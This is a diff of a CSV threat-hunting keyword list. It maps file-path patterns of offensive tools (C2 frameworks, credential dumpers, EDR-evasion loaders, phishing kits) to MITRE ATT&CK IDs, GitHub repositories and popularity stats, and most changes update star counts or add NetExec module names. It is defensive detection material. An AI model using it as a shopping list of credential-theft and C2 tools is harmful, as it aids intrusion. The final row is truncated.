"*\EternalHushCore\*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" @@ -6113,7 +6193,7 @@ "*\evil_pdf\*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*\EvilClippy*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*\evilclippy.cs*","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","0","N/A","10","10","1956","381","2022-05-19T23:00:22Z","2019-03-26T12:14:03Z" -"*\EvilnoVNC*","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","7","662","118","2023-09-25T10:50:52Z","2022-09-04T10:48:49Z" +"*\EvilnoVNC*","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","7","662","118","2023-10-04T15:20:08Z","2022-09-04T10:48:49Z" "*\evilSignatures.db*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" "*\exe_to_dll\*","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","0","N/A","5","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*\Exegol-*.zip*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" @@ -6122,50 +6202,59 @@ "*\Exegol-images-*\*docker*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*\exfiltrate.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" "*\ExternalC2\*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" -"*\FakeCmdLine*","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","0","N/A","N/A","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\FakeCmdLine*","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","0","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" "*\Fertliser.exe*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*\Fertliser.pdb*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" -"*\Files\ContainersFileUrls.txt*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","0","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*\Files\ContainersFileUrls.txt*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","0","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*\find-computer.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\follina.py*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","1","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z" -"*\freeze.go","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","10","1333","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" +"*\freeze.go","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","10","1334","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" "*\FtpC2\*","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","0","N/A","10","10","72","15","2023-06-23T08:40:08Z","2023-06-09T12:41:28Z" "*\FudgeC2*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*\get_netconnections.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\GetBrowsers.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*\get-desc-users.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\Get-SpoolStatus.ps1*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*\GetWebDAVStatus\","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","0","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" "*\GetWebDAVStatus_x64*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","0","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" "*\glit.exe*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" "*\glit-cli*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" "*\gmailC2.exe*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" -"*\gocrack-1.0.zip*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1074","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" -"*\gocrack-master.*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1074","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" -"*\GodFault.*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" -"*\Godpotato\*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1186","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*\gocrack-1.0.zip*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*\gocrack-master.*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*\GodFault.*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*\Godpotato\*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" "*\GoFetchLog.log*","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","0","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" -"*\go-secdump*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","0","N/A","10","1","81","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" +"*\go-secdump*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","0","N/A","10","1","82","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" "*\goZulipC2*","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","0","N/A","10","10","5","2","2023-08-31T12:06:58Z","2023-08-13T11:04:20Z" -"*\GPOddity\*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"*\Group3r.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*\Grouper2.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*\GzipB64.exe*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*\GPOddity\*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*\gpp_autologin.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\gpp_password.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\group_members.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\Group3r.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*\Grouper2.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*\groupmembership.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\GzipB64.exe*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "*\HackBrowserData*","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","0","N/A","10","10","148","21","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" "*\Hades.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" "*\hades.exe*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*\hades-main.zip*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" -"*\handlekatz.exe*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"*\handlekatz.exe*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\handlekatz.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\harvest.cmb*","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense 